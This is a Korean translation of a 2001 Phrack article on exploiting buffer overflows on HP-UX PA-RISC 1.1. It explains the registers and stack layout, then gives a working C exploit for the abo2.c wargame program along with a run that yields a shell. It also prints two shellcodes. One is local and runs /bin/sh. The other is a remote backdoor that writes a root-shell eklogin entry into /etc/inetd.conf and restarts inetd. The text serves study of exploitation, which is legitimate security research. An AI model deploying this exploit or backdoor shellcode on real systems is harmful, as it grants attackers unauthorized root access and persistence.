************************************************************************ 
                제목:  HP-UX (PA-RISC 1.1) 오버플로우(프랙 58호) 
                번역: vangelis(http://www.wowhacker.org) 

                * 혹시라도 오역이나 오타 있으면 말씀해주시길 바랍니다. 
                * 의문점: 저자가 영어권 사람인지??? 
********************************************************************* 

                                      ==Phrack Inc.== 

               Volume 0x0b, Issue 0x3a, Phile #0x0b of 0x0e 

|=-----------------=[ HP-UX (PA-RISC 1.1) 오버플로우 ]=-------------------=| 
|=------------------------------------------------------------------------=| 
|=----------------=[ Zhodiac  <zhodiac@softhome.net> ]=------------------=| 


--[ 도입 

빌어먹을! 또 다른 버퍼 오버플로우 문서라니!! 음... 이 문서는 버퍼 오버플로우 
공격을 설명하기 위해 의도된 것이 아니며, asm 코딩을 설명하기 위한 것도 아니다. 
이 문서는 주로 세가지 토픽에 초점을 맞추고 있다. 
   
  HP-UX/PA-RISC 레지스터와 스택 구조 
  abo2.c를 위한 솔루션(community.core-sdi.org/~gera/InsecureProgramming/에 위치) 
  이 OS/arch용 두 가지 쉘코드 

HP-UX/PA-RISC 1.1 하에서 버퍼 오버플로우를 공격하는 것을 시작하기 위한 기본적인 
토픽을 포함하고 있다. 이 문서는 다음 섹션으로 구분된다. 


  1. PA-RISC 소개 
    1.1. RISC 기본사항 
    1.2. 레지스터 
    1.3. Leaf 및 non-leaf 함수들 
  2. 스택 구조 
  3. 발전된 버퍼 오버플로우 #2 
  4. 특별한 것들 
    4.1. 로컬 쉘코드 
    4.2. 원격 쉘코드 
  5. 리소스들 
  6. 인사 


--[ 1. PA-RISC 소개 

--[ 1.1. RISC 기본사항들 

  RISC (Reduced Instruction Set Computing)는 줄어든 명령셋을 가지고 있고, 
CISC(Complex instruction Set Computing) 프로세스의 같은 임무를 하는 능력을 
가진 프로세스를 지칭한다. 

RISC 프로세스는 몇가지 공통된 특징을 가지고 있다: 

  - 메모리 접근용 로딩 및 저장 디자인 
  - 어드레싱의 넘버를 줄임 
  - 명령 크기는 항상 같다(Speeds up)   
  - 몇가지 명령 포맷 
  - 메모리보다는 레지스터를 더 많이 사용 


PA-RISC arch를 더 깊게 살펴보면 몇가지 명확한 특징을 가지고 있다: 

  - 직접적인 어드레싱, offset 없는 관계 
  - 명령에서 사전 감소 
  - 명령에서 사후 증가 
  - 12가지의 명령 포맷, 이들 모두 32 비트를 가짐 


--[ 1.2. 레지스터 

PA-RISC 1.1에는 4가지 타입의 레지스터가 있다: 

  - 일반적인 레지스터 (32) 
  - Float 포인터 레지스터 (32) 
  - Space 레지스터 (8) 
  - Control 레지스터 (25) 

  우리는 쉘코드 프로그래밍과 버퍼 오버플로우 공격에 관련된 "일반적인 레지스터"에 
초점을 맞출 것이다. 이 레지스터들은 나중에 보게 되겠지만 %gr0 (%r0)인 것을 
제외하고 CPU가 특권 상태에 있지 않을 때조차도 언제라도 사용될 수 있다. 

일반적인 레지스터의 몇가지 용법을 설명하기로 하겠다. 

- %gr0: 항상 0 값을 포함하고 있으며, 만약 그것에 뭔가를 쓰려고 한다면 폐기될 
것이다. 
- %gr1: ADDIL 명령의 타겟 레지스터. 공유 라이브러리 함수를 호출할 때 함수를 
호출하기 전에 소위 말하는 "공유 라이브러리 stub"의 리턴 어드레스를 저장한다. 
- %gr2 (%rp): 이 레지스터에서 함수 호출이 BL(Branch and Link)로 이루어질 때 리턴 
어드레스를 저장한다. 
- %gr3-%gr21: 일반적인 용도의 레지스터 
- %gr19: 공유 라이브러리 함수를 호출할 때 링크 테이블 base 레지스터이다. 
- %gr22: 그것들 중의 하나를 호출할 때 syscall 번호를 저장 
- %gr23-gr26: 함수 인수 arg0-arg3를 저장 
- %gr28,gr29 (%ret0, %ret1): %gr28에 함수 또는 syscall의 리턴값을 저장(직접적인 
값 또는 reference address). 어떤 환경에서 그 값은 %gr29에 분류된다. 
- %gr30: 여기서 현재 스택 포인터를 저장. 16비트로 조정되어야 한다. 

- %gr31: PA-RISC 2.0 하에서 BLE 명령이 실행될 때 리턴 어드레스를 포함 


마지막 몇가지 주의점: 

  - PA-RISC 1.0 아래에서는 단지 16 Floating-Point 레지스터가 있으며, PA-RISC 1.1 
및 2.0에서는 32개가 있다. 
  - Control 레지스터는 CPU가 특권 모드에 있을 때만 접근이 가능하다. 
  - PA-RISC 2.0 레지스터 사이즈는 64 비트이다. 


--[ 1.3. Leaf 및 non-leaf 함수들 

SPARC과 비슷하게 HP-UX 아래에서는 주로 두가지로 함수를 분류할 수 있다. 

  - Leaf 함수들: 추가 어떤 함수도 호출하지 않는다. 

추가 어떤 함수도 호출하지 않기 때문에 Leaf 함수는 메모리에 %rp를 저장하지 
않는다. 왜냐하면 호출된 새로운 함수에 의해서 결코 덮어쓰이지 않을 것이기 
때문이다. 

다음은 코드의 예와 leaf 함수의 gdb 디스어셈블 덤프이다. 

HP9000:~/overflows/leaf$ cat leaf.c 

int leaf(char *buff) { 
  int a=0; 
  a=1; 
} 

int main(int argc, char **argv) { 
  leaf(argv[1]); 
} 

HP9000:~/overflows/leaf$ 

gdb disass dump에서도 볼 수 있듯이 스택에 %rp를 결코 저장하지 않는다. 

(gdb) disass leaf 
Dump of assembler code for function foo: 
0x3280 <leaf>:           copy r3,r1 
0x3284 <leaf+4>:         copy sp,r3 
0x3288 <leaf+8>:         stw,ma r1,40(sr0,sp) 
0x328c <leaf+12>:        stw r26,-24(sr0,r3) 
0x3290 <leaf+16>:        stw  r0,8(sr0,r3) 
0x3294 <leaf+20>:        ldi 1,r19 
0x3298 <leaf+24>:        stw  r19,8(sr0,r3) 
0x329c <leaf+28>:        ldo 40(r3),sp 
0x32a0 <leaf+32>:        ldw,mb -40(sr0,sp),r3 
0x32a4 <leaf+36>:        bv,n r0(rp) 
End of assembler dump. 
(gdb) 


  - Non-Leaf 함수들: 적어도 하나의 함수를 호출한다. 

  Non-Leaf 함수들은 추가 어떤 함수도 호출하지 않기 때문에 항상 스택에 %rp를 
저장한다. 왜냐하면 호출된 함수는 wn 리턴 포인터로 %rp를 덮어쓸 것이기 
때문이다. 

다음은 코드의 예와 leaf 함수의 gdb 디스어셈블 덤프이다. 

HP9000:~/overflows/non-leaf$ cat non-leaf.c 
   
int non_leaf(char *buff) { 
  int a=0; 
  a=1; 
  sleep(1); 
} 

int main(int argc, char **argv) { 
  non_leaf(argv[1]); 
} 

HP9000:~/overflows/non-leaf$ 

gdb disass dump에서  "stw rp,-14(sr0,sp)"에서 스택에 %rp를 저장한다는 것을 볼 수 
있다. 


(gdb) disass non_leaf 
Dump of assembler code for function foo: 
0x32b0 <non_leaf>:           stw rp,-14(sr0,sp) 
0x32b4 <non_leaf+4>:         copy r3,r1 
0x32b8 <non_leaf+8>:         copy sp,r3 
0x32bc <non_leaf+12>:        stw,ma r1,80(sr0,sp) 
0x32c0 <non_leaf+16>:        stw r26,-24(sr0,r3) 
0x32c4 <non_leaf+20>:        stw  r0,8(sr0,r3) 
0x32c8 <non_leaf+24>:        ldi 1,r19 
0x32cc <non_leaf+28>:        stw  r19,8(sr0,r3) 
0x32d0 <non_leaf+32>:        ldi 1,r26 
0x32d4 <non_leaf+36>:        b,l 0x3298 <sleep>,rp 
0x32d8 <non_leaf+40>:        nop 
0x32dc <non_leaf+44>:        ldw -14(sr0,r3),rp 
0x32e0 <non_leaf+48>:        ldo 40(r3),sp 
0x32e4 <non_leaf+52>:        ldw,mb -40(sr0,sp),r3 
0x32e8 <non_leaf+56>:        bv,n r0(rp) 
0x32ec <non_leaf+60>:        break 0,0 
End of assembler dump. 
(gdb) 


--[ 2. 스택 구조 

다음 스택 구조는 HP-UX B10.20의 PA-RISC 1.1과 gcc 컴파일러를 사용해 만들어진 
것이다.(몇가지는 cc로 설명할 것이다) 나는 이것에 대한 어떤 문서도 보지 못했으며, 
그래서 gdb와 나의 추론 능력에 기반을 두고 작성했다. 

  PA-RISC는 SPARC가 하는 것처럼 함수 시작(prelude)에서 레지스터 값을 저장하기 
위해 "save", "restore"와 같은 명령을 가지고 있지는 않다. 이 모든 것은 컴파일러 
사이의 변화와 소프트웨어를 통해 구현되어 있다. 

우리는 버퍼 오버플로우와 관련된 non-leaf 함수에 초점을 맞출 것이다. 모든 
"non-leaf" 함수는 함수의 시작과 마지막을 구현한다. 예를 들어 main()에서 


        0x3380 <main>:          stw rp,-14(sr0,sp) 
        0x3384 <main+4>:        copy r3,r1 
        0x3388 <main+8>:        copy sp,r3 
        0x338c <main+12>:       stw,ma r1,40(sr0,sp) 
        0x3390 <main+16>:       stw r26,-24(sr0,r3) 
        0x3394 <main+20>:       stw r25,-28(sr0,r3) 

        ... 

        0x33e0 <main+96>:       ldw -14(sr0,r3),rp 
        0x33e4 <main+100>:      ldo 40(r3),sp 
        0x33e8 <main+104>:      ldw,mb -40(sr0,sp),r3 
        0x33ec <main+108>:      bv,n r0(rp) 


        무엇이 일어나는지 차례대로 살펴보자: 

  - 0x3380 <main>:          stw rp,-14(sr0,sp) 

    %sp-0x14에 리턴 어드레스(BL 다음의 %rp에)를 저장한다. 원시 C 컴파일러는 
%sp-0x18에 그것을 저장한다. 

  - 0x3384 <main+4>:        copy r3,r1 

    %r1에 %r3을 복사한다. 이것은 %r3에 이전 함수의 %sp를 저장할 것이기 때문이다. 

   
  - 0x3388 <main+8>:        copy sp,r3 

    Copy %sp in %r3. 

  - 0x338c <main+12>:       stw,ma r1,40(sr0,sp) 

스택에 %r1(   the sp of to back functions)을 저장하고, 0x40에 %sp를 증가시킨다. 
이 0x40은 그것 자체의 로컬 변수를 위해 프레임 메이커와 다음 함수의 인수들을 위해 
64 바이트를 추가로 공간을 예약한다.(프레임 메이커는 호출될 다음 함수의 것이며, 
이것은 매우 중요하다.) 

  - 0x3390 <main+16>:       stw r26,-24(sr0,r3) 

%r3 (마지막 %sp) - 0x24에 스택(마지막 함수를 위해 예약된 공간)에 함수의 첫번째 
인자(%r26)를 복사 

  - 0x3394 <main+20>:       stw r25,-28(sr0,r3) 
     
함수의 두번째 인자(%r25)를 %r3 (last %sp) - 0x28의 스택(마지막 함수를 위해 
예약된 공간)에 복사     

마지막 두개의 명령 메커니즘처럼 첫번째 네 인자들은 %r26-%r23에 저장될 것이다. 
함수로의 jmp 앞에 4개의 인자 이상이 있을 경우 적절한 곳에 스택에 저장될 것이다. 


    F.e.   arg4 ---> %r3 - 52 
           arg5 ---> %r3 - 56 
           arg6 ---> %r3 - 60 
           ... 

  그래서 스택 구조는 다음과 같다: 


                 |                         | 
                 --------------------------- %sp    \ 
                 |                         |        | 
                 |                         |        | 
                 |                         |        | 
                 |                         |        | 
                 |                         |        | 
                 |                         |        | 프레임 메이커와   
                 |                         |        | 다음 함수의 인자를 위해 
                 |                         |        | 예약된 공간 
                 |                         |        | 항상 64 바이트. 
                 |                         |        | 
                 |                         |        | 
                 |                         |        | 
                 |                         |        | 
                 |                         |        | 
                 |                         |        | 
                 |                         |        | 
                 ---------------------------       / 
                 |                         |       \ 
                 |                         |        | 함수의 로컬 변수를 위해 
                             ...                     | 예약된 공간 
                 |                         |        | 
                 |                         |        | + 4 바이트 (%r1) 
                 |           %r1           |       / 
                 --------------------------- %r3   \ 
         -4      |                         |        | 
         -8      |                         |        | 
         -12     |                         |        | 현재 함수의 프레임 메이커 
         -16     |                         |        | 
         -20     |       %r2 (%rp) gcc     |        | 
         -24     |       %r2 (%rp) cc      |        | 
         -28     |                         |        | 
         -32     |                         |       / 
         -36     |       arg1 = %r26       |       \ 
         -40     |       arg2 = %r25       |        | 
         -44     |       arg3 = %r24       |        | 현재 함수의 
         -48     |       arg4 = %r23       |        | 인자를 위해   
         -52     |       arg5              |        | 예약된 공간 
         -56     |       ...               |        | 
         -60     |                         |        | 
         -64     |                         |        | 
                 ---------------------------       / 
                 |                         | 

이 유용한 정보와 더불어 만약 버퍼 오버플로우가 스택에서 발생하고, 어떤 함수의 
지역변수를 오버플로우시킨다면 우리는 호출된 다음 함수의 프레임 메이커를 덮어쓸 
것이다. 이 "다음 함수"는 버퍼를 복사하는 함수 strcpy(), sprintf() 등등으로 
사용된다. 

이것이 왜 다음 프로그램이 익스플로잇될 수 없었던가의 이유이다. 왜냐하면 버퍼를 
복사하는 "다음 함수"가 없고,  우리가 잠시 버퍼를 복사하기 때문이다.   


  void vulnerable_func(char *buffer) { 
  char buffer2[128]; 
  int counter=0; 

     while(buffer[counter]!='\0') { 
      buffer2[counter]=buffer[counter]; 
      counter++; 
     } 

   printf("Buffer: %s\n",buffer); 
  } 

  int main(int argc, char **argv) { 

   vulnerable_func(argv[1]); 
  } 


각 함수의 끝 부분에 우리는 우리가 본 모든 오퍼레이션(스택으로부터 %rp를 읽고, 
%sp와 %r3을 저장하고, %rp로 분기)취소한다. 


--[ 3. 발전된 버퍼 오버플로우 #2 

다음 웹 페이지에서: 

  http://community.core-sdi.com/~gera/InsecureProgramming/ 

버퍼 오버플로우, 힙 오버플로우, 포맷 스트링 버그 등등과 같은 많은 타입의 버그에 
취약한 몇 가지 프로그램들이 있다. 

우리는 많은 사람들을 골치 아프게 한 Advance Buffer Overflow #2 (abo2.c)에 초점을 
맞출 것이다. 

HP9000:~/overflows/sample$ cat abo2.c 
/* abo2.c                                                    * 
* specially crafted to feed your brain bygera@core-sdi.com */ 

/* This is a tricky example to make you think                * 
* and give you some help on the next one                    */ 

int main(int argv,char **argc) { 
    char buf[256]; 

    strcpy(buf,argc[1]); 
    exit(1); 
    } 
HP9000:~/overflows/sample$ 

  많은 사람들은 "공격이 가능하지 않다"라고 말한다. 나는 "x86 아키텍처에서는 
공격이 가능하지 않다"라고 말하고 싶다. 하지만 PA-RISC와 같은 다른 
아키텍처에서는 공격이 가능하다. 

x86 플랫폼에서는 충분한 길이의 버퍼를 제공함으로써 main()의 리턴 어드레스를 
덮어쓸 수 있을 것이다. 하지만 피할 수 없는 exit() 때문에 우리는 결코 취약한 
프로그램의 플로우를 통제하지는 못할 것이다. 좀더 좋게 말하면: "나는 그것을 
통제할 수 없었다." 

우리는 exit()가 실행되기 전에 프로그램의 플로우를 통제할 방법을 찾아야 한다. 
HP-UX10.20/PA-RISC 하에서는 스택(%r30 or %sp)이 낮은 주소에서 높은 주소로 자라기 
때문에(리눅스 x86과 같은 몇몇 다른 아키텍처와는 반대로), 그리고 역시 이 문서에서 
설명된 스택 구조 때문에 우리는 main()의 리턴 어드레스를 덮어쓰지 못할 것이다. 
하지만 우리는 strcpy()의 리턴 어드레스는 덮어쓸 것이다. 그래서 일단 버퍼가 
복사되고, strcpy가 그것 자체의 %rp로 분기하면 exit()가 실행되기 전에 프로그램의 
흐름을 우리의 쉘코드가 통제권을 가질 것이다. 
  이 모든 것은 non-leaf 함수처럼 HP-UX B.10.20 하에서 strcpy()가 구현되어 있기 
때문이다. Fyodor Yarochkin은 HP-UX 11.00 하에서는 strcpy()가 leaf 함수로 
구현되어 있기 때문에 이 특별한 오버플로우는 그 버전의 HP-UX에서는 익스플로잇 
되지 않을거라고 나에게 말했다. 
   
나는 strcpy()의 오버플로우가 HP-UX 11.00 아래에서 공격하는 것이 가능하지 
않다라고 말하는 것이 아니다. 다음 코드를 한번 보고 왜 여전히 공격이 가능한지 
알아보아라. 

HP9000:~/overflows/hp11-strcpy$ cat hp11-strcpy.c           
void foo(char *buff,char *dest) { 
  strcpy(dest,buff); 
} 

int main(int argc, char **argv) { 
  char buffer[128]; 

  foo(argv[1],buffer); 
} 
HP9000:~/overflows/hp11-strcpy$ 


개념 증명: 

HP9000:~/overflows/sample$ uname -a 
HP-UX HP9000 B.10.20 A 9000/712 2013496278 two-user license 
HP9000:~/overflows/abo2$ cat abo2.c 
/* abo2.c                                                    * 
* specially crafted to feed your brain bygera@core-sdi.com */ 
   
/* This is a tricky example to make you think                * 
* and give you some help on the next one                    */ 

int main(int argv,char **argc) { 
    char buf[256]; 
     
    strcpy(buf,argc[1]);   
    exit(1); 
    } 
HP9000:~/overflows/abo2$ 

HP9000:~/overflows/abo2$ cat xploit.c 
/* 
* abo2.c xploit by Zhodiac <zhodiac@softhome.net> 
* 
* http://community.core-sdi.com/~gera/InsecureProgramming/   
* 
* Xploited on HPUX 
* 9/9/2001 
* 
* Madrid 
* 
*/ 
#include <stdio.h> 
     
//#define NOP 0x3902800b 
#define NOP 0x08630243 
#define BUFFSIZE 256+48+1 
#define NUMADDR 10 
#define OFFSET -80 
   
char shellcode[] = 
"\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40" 
"\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe" 
"\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe" 
"/bin/sh\xff"; 

long get_sp(void) { 
   __asm__("copy %sp,%ret0 \n"); 
} 
   
int main(int argc, char *argv[]) { 
char buffer[BUFFSIZE]; 
char *ch_ptr; 
unsigned long addr,offset=OFFSET; 
int aux; 

if (argc==2) offset=atoi(argv[1]); 

addr=get_sp()+offset; 

memset(buffer,0,sizeof(buffer)); 
ch_ptr=(char *)buffer; 

for (aux=0; aux<(BUFFSIZE-strlen(shellcode)-NUMADDR*4)/4; aux++) { 
      *(ch_ptr++)=(NOP>>24)&255; 
      *(ch_ptr++)=(NOP>>16)&255; 
      *(ch_ptr++)=(NOP>>8)&255; 
      *(ch_ptr++)=NOP&255; 
      } 

memcpy(ch_ptr,shellcode,strlen(shellcode)); 
ch_ptr+=strlen(shellcode); 
for (aux=0; aux<NUMADDR; aux++) { 
     *(ch_ptr++)=(addr>>24)&255; 
     *(ch_ptr++)=(addr>>16)&255;   
     *(ch_ptr++)=(addr>>8)&255; 
     *(ch_ptr++)=addr&255; 
     } 

buffer[BUFFSIZE-1]='\0'; 
printf("Return Address %#x\n",addr); 
printf("Buffer Size: %i\n",strlen(buffer)); 
       
if (execl("./abo2","abo2",buffer,NULL)==-1) { 
    printf("Error at execl()\n"); 
    exit(-1); 
    }   

} 
HP9000:~/overflows/abo2$ 

HP9000:~/overflows/abo2$ gcc -o xploit xploit.c 
HP9000:~/overflows/abo2$ gcc -o abo2 abo2.c 
     
HP9000:~/overflows/abo2$ ./xploit 
Return Address 0x7b03a5b0 
Buffer Size: 304 
$ uname -a 
HP-UX HP9000 B.10.20 A 9000/712 2013496278 two-user license 
$ exit 
HP9000:~/overflows/abo2$ 


--[ 4. 특별한 것들 

  여기에 HP-UX용 쉘코드가 두 가지 있다.  첫번째는 로컬 코드이며, /bin/sh을 
실행한다. 하지만 크기는 단지 47 바이트로 줄어들었다. 두번째는 그것의 
개발시기에 내가 알고 있는 첫번째의 원격 쉘코드이다. 그것은 tcp 포트에 쉘을 
투입하기 위해 inetd를 사용한다. 모든 syscalls socket(), bind(), dup2()를 
구현하는 제 삼의 쉘코드가 있는데 내가 잃어버렸다. 빌머먹을!! (<---- 멍청이, 
역자 주) 


--[ 4.1. 로컬 쉘코드 
   
  요즘 몇몇 HP-UX 쉘코드들이 있지만(Fyodor와 lsd-pl이 몇몇을 개발함), 
개발시기에는 유일하게 공개된 것은 ADM의 K2 중의 하나였다. 이 쉘코드는 어느정도 
최적화되어 있으며, 크기면에서 13바이트 더 낮다) 

/* 
* HP-UX 47 bytes shellcode 
* 
*    By Zhodiac <zhodiac@softhome.net> 
* 
* Madrid, 13/05/2001 
* 
*/ 


char shellcode[]= 
"\xe8\x3f\x1f\xfd"      /*              bl salto,%r1               */ 
"\x0b\x39\x02\x99"      /* salto:       xor %r25,%r25,%r25         */ 
"\x34\x02\x04\xc0"      /*              ldi 0x260,%r2              */ 
"\x08\x41\x04\x03"      /*              sub %r1,%r2,%r3            */ 
"\x60\x79\x05\x08"      /*              stb %r25,0x284(%sr0,%r3)   */ 
"\xb4\x7a\x04\xfa"      /*              addi 0x27D,%r3,%r26        */ 
"\x0b\x18\x02\x98"      /*              xor %r24,%r24,%r24         */ 
"\x20\x20\x08\x01"      /*              ldil L'0xC0000004,%r1      */ 
"\xe4\x20\xe0\x08"      /*              ble R'0xC0000004(%sr7,%r1) */ 
"\x94\x56\x05\x36"      /*              subi 0x29b,%r2,%r22        */ 
"/bin/sh"; 


--[ 4.2. 원격 쉘코드 

/* 
* HP-UX remote shellcode 
* 
*    By Zhodiac <zhodiac@softhome.net> 
* 
* Madrid, 14/05/2001 
* 
*/ 

char shellcode[]= 
"\xe8\x3f\x1f\xfd"      /*              bl salto,%r1               */ 
"\x0b\x39\x02\x99"      /* salto:       xor %r25,%r25,%r25         */ 
"\x34\x02\x04\xc0"      /*              ldi 0x260,%r2              */ 
"\x08\x41\x04\x03"      /*              sub %r1,%r2,%r3            */ 
"\x60\x79\x05\x78"      /*              stb %r25,0x2BC(%sr0,%r3)   */ 
"\x60\x79\x05\x7e"      /*              stb %r25,0x2BF(%sr0,%r3)   */ 
"\x68\x79\x05\x62"      /*              stw %r25,0x2AE(%sr0,%r3)   */ 
"\xb4\x7a\x05\x6A"      /*              addi 0x2B5,%r3,%r26        */ 
"\x0f\x5a\x12\x81"      /*              stw %r26,-16(%sr0,%r26)    */ 
"\x94\x44\x04\xd0"      /*              subi 0x268,%r2,%r4         */ 
"\x0b\x44\x06\x04"      /*              add %r4,%r26,%r4           */ 
"\x0f\x44\x12\x89"      /*              stw  %r4,-12(%sr0,%r26)    */ 
"\x94\x44\x04\xd6"      /*              subi 0x26C,%r2,%r4         */ 
"\x0b\x44\x06\x04"      /*              add %r4,%r26,%r4           */ 
"\x0f\x44\x12\x91"      /*              stw  %r4,-8(%sr0,%r26)     */ 
"\xb7\x59\x07\xe1"      /*              addi -16,%r26,%r25         */ 
"\x0b\x18\x02\x98"      /*              xor %r24,%r24,%r24         */ 
"\x20\x20\x08\x01"      /*              ldil L'0xC0000004,%r1      */ 
"\xe4\x20\xe0\x08"      /*              ble R'0xC0000004(%sr7,%r1) */ 
"\x94\x56\x05\x36"      /*              subi 0x29b,%r2,%r22        */ 
"AAAA" 
"BBBB" 
"CCCC" 
"ZZZZ" 
"/bin/sh -c echo \"eklogin stream tcp nowait root /bin/sh sh -i\" >> " 
"/etc/inetd.conf ; /usr/sbin/inetd -c ; "; 


--[ 5. 참고문헌 

[1]  Some PDFs i found at http://www.freelsd.net/~ndubee/ (Great 
      collection :) and http://docs.hp.com/ 
      * PA-RISC 1.1 Architecture and Instruction Set Reference Manual 
      * PA-RISC Architecture and Instruction Set Reference Manual 
      * http://www.devresource.hp.com/partner/rad.10.20.pdf 
      * http://www.devresource.hp.com/partner/rad.11.0.32.pdf 

[2]  PA-RISC 2.0 Architecture 
      Gerry Kane 
      ISBN 0-13-182734-0 

[3]  Buffer overflow on non-intel platforms (BlackHat 2001 Asia) 
      Fyodor Yarochkin. 
      http://www.notlsd.net/bof/index.html 

[4]  lsd-pl HP-UX shellcodes (You people, are really good! Hope to talk 
      to you in future!) 
      http://lsd-pl.net 

[5]  You can mail me with any doubt you have :) 
      Zhodiac <zhodiac@softhome.net> 


--[ 6.- 인사 

     - [CrAsH], without her support this document would not exist. :*** 
     - DarkCode for long long time talking about SPARC and PA-RISC 
          archs :) 
     - Fyodor Yarochkin for the few, but great, chats we had about 
          PA-RISC. For the review of this paper. Thx. 
     - El Nahual for having fun in real and net-life ;P I owe you a mail. 
     - 0xdeadcafe mail-list for great discussion topics. 


Madrid 11/10/2001 

|=[ EOF ]=---------------------------------------------------------------=|